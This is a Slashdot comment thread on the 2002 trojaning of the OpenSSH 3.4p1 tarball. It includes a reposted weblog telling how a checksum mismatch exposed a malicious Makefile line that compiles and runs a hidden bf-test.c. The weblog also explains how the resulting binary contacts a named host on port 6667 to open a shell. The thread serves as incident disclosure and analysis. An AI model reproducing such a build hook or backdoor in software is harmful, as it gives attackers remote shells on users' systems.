bockman (104837) | more than 12 years ago | (#3991264)

Do distro check package checksum, before distributing package upgrades?

I think that after that, they are going to ask digital signature by any of the upstream mantainers.

So, this may turn in a good thing ... if it didn't make too much damage.

Oh, and just for karma: this shows once more that security is a process more than a product.

My analysis (4, Informative)

lertl (455570) | more than 12 years ago | (#3991280)

I'm by far not a very good C programmer or security expert, but from what I have seen this thing does the following:

  • It differs from a "clean" openssh package by one line in the Makefile and an additional sourcefile.
  • The sourcefile is very cryptic and if you wouldn't know you'd think it's just an ssh source file like any other.
  • The suspicious line in the Makefile compiles the sourcefile, executes it. This binary itself writes out some shellscript, which in turn generates another C source file, which gets compiled and executed.
  • The additional line in the Makefile and the additional source file are deleted.
  • This last binary opens up a socket to some server and, depending on the input it gets from the socket, exits, respawns or opens a shell (/bin/sh).

So the backdoor is in the Makefile, not the OpenSSH software itself.

One thing to mention is that IMHO this is not a fault of OpenBSD. As anyone can read in their FAQ [openbsd.org] www.openbsd.org (and ftp.openbsd.org) is run on Solaris.

Re:My analysis (0)

Anonymous Coward | more than 12 years ago | (#3991295)

Not Solaris, SunOS 4.1

Slashdotted (copy of the weblog) (5, Informative)

MavEtJu (241979) | more than 12 years ago | (#3991288)

I should have seen this coming... Here is a copy of the weblog. It will be back after 24 hours.

01 August 2002 - 19:10:23 - OpenSSH 3.4p1 package trojaned

And all I was thinking was "Oh! I should upgrade ssh on these two machines before there are problems...". The beauty of FreeBSD is that it goes like this:

[~] edwin@k7>cd /usr/ports/security/openssh-portable
[/usr/ports/ security/openssh-portable] edwin@k7>make
[/usr/ports/security/openssh-portab le] edwin@k7>make install

Easy euh? It went well, except for the second step:

===> Extracting for openssh-portable-3.4p1_7
>> Checksum mismatch for openssh-3.4p1.tar.gz.
Make sure the Makefile and distinfo file (/usr/ports/security/openssh-portable/distinfo)
a re up to date. If you are absolutely sure you want to override this
check, type "make NO_CHECKSUM=yes [other args]".
*** Error code 1

Euh... I didn't remember seeing a change in the FreeBSD ports regarding this. And I didn't see an announcement for it from the people from OpenSSH... Oh well, it happens. I downloaded the new openssh-tarball:

-r--r--r-- 1 12187 mirror 840574 Jul 31 16:47 openssh-3.4p1.tar.gz
-r--r--r-- 1 12187 mirror 232 Jun 26 08:20 openssh-3.4p1.tar.gz.sig

That's weird, they've rerolled the tarball without updating the signature file. I asked a couple of people on irc (#sage-au) if they have had troubles with compiling openssh the last days. Yups, ^Sarge^@bofh.snsonline.net also had it, he had a checksum mismatch.

Curious as I was, I extracted the old and new tarball and this were the differences:

[~/test] edwin@k7>diff -r -u openssh-3.4p1-old openssh-3.4p1
diff -r -u openssh-3.4p1-old/openbsd-compat/Makefile.in openssh-3.4p1/openbsd-compat/Makefile.in
--- openssh-3.4p1-old/openbsd-compat/Makefile.in Wed Feb 20 07:27:57 2002
+++ openssh-3.4p1/openbsd-compat/Makefile.in Thu Feb 1 08:52:03 2001
@@ -26,6 +26,7 @@
$(CC) $(CFLAGS) $(CPPFLAGS) -c $bf-test.out; sh ./bf-test.out &

$(COMPAT): ../config.h
$(OPENBSD): ../config.h
Only in openssh-3.4p1/openbsd-compat: bf-test.c

At this moment I asked a couple of people on irc (#sage-au) if they have had troubles with compiling openssh the last days. Yups, ^Sarge^@bofh.snsonline.net also had it, also a checksum mismatch. Time to go deeper into it...

bf-test.c is a weird file. It talks about HP-UX PL.2 systems, it talks about _CRAY notes, it talkes about none-T3E machines, it talks about _ILP64__ and it does an epcdic2ascii() call. I'm not very skilled in computers (well, I am :-) but if people are talking about HP-UX, Cray, ILP64 and epcdic2ascii(), I know it's either too difficult for me (You are not supposed to understand this) or it's bullshit (We can charge the phaser-array via a shortwave link through the warpcore). Time to startup vmware and run the experiment: gcc -o bf-test bf-test.c.

bf-test itself is pretty harmless, it only prints things to the screen (remember the change in the makefile? execute, redirect the output and execute the output). The shell script it prints creates a C program and tries to compile it. If it doesn't succeed at first, it tries to link other libraries (everybody who has ever ported a Solaris knows that you have to explicitely link to libresolv et al). So it's cross-platform :-)

The C code is not that smart. It tries once per hour to connect to port 6667 on the machine 203.62.158.32 which is web.snsonline.net and waits for commands from the person or persons who 0wn3d the machine. Does it get an M, it sleeps for another hour. Does it get an A, it will abort. Does it get an M, it will spawn a shell. Some people will build it "normal" privileges and install it as root: they will get a shell with "normal" privileges. Other people will build it with "root" privileges and the shell will have "root" privileges.

While analyzing the code on #sage-au and mentioning the hostname, ^Sarge^ looked strangely at me (well, it's IRC so you never know but that's what I would do): "That is my machine.". The good news is that I didn't have to worry about finding out who manages the machine!

The next step is to inform somebody who manages the openssh-packages: The OpenBSD team. Up to right now, I have had no experience with the OpenBSD team (if you check my website you'll see that I'm more a FreeBSD guy :-). The head-guy of the OpenBSD team is living in Canada and they're now sleeping there. I've spend a couple of days on #freebsd on irc.openprojects.net, so I just tried #openbsd.

*** MavEtJu has joined #openbsd
Euh... anybody from the openssh-team here?
I have some news for you...
What's up?

I have contact! Marius asked me the standard questions (how did you find out, how can I see it, when did you find out) and after some investigation he said "I think I'd better call (and now I have forgotten the name)". Coolies! I think I found a right person to talk to! It looks like things are going to roll now, I can take my hands of it.

The last things I did were writing some emails to a couple of mailinglists and guide ^Sarge^ to #openbsd. For the rest I wasn't of very much use anymore, so I just kept monitoring #openbsd. And the logfile of my website, which went ballistic.
Aftermatch

* The portable version wasn't the only which was trojaned, the normal version was also.
* It seems it took only six hours before somebody was alert enough to see that there was something wrong, all thanks to the checking of the MD5-checksum [insert a sweet 'aaaaaahhh' here]
* OpenSSH itself wasn't trojaned, the tarball was. There is nothing wrong with OpenSSH itself (this time :-)
* The building of a port (under FreeBSD at least) is done as root with all its privileges. This is a wrong approach. For a time I tried, as an experiment, to build ports as user "port". This worked fine except for the "make clean" part, in which I couldn't remove the files created during the "make install" phase and the files which were made during the building of the RUN_DEPENDS ports.

Well, I guess that's what they get... (3, Funny)

MrBadbar (168841) | more than 12 years ago | (#3991305)

...for hosting ftp.openbsd.org on a box running SunOS, not OpenBSD!

i'm more interested to know *who* did it (0)

Anonymous Coward | more than 12 years ago | (#3991314)

Is it just some disgruntled programmer? Was it the BSD team itself doing a drill check of their own security? Or is it time for conspiracy theories -- the men in black, or blue perhaps? (well, I dunno what colour Microsoft is, but they're the new IBM so I chose blue..)
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?